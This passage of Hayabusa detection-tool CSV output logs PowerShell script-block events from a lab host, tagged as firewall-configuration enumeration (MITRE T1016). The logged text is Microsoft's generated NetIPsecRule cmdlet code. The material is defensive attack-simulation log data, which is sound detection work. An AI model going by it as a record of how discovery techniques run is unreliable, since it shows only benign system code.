$__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_v",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"alues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 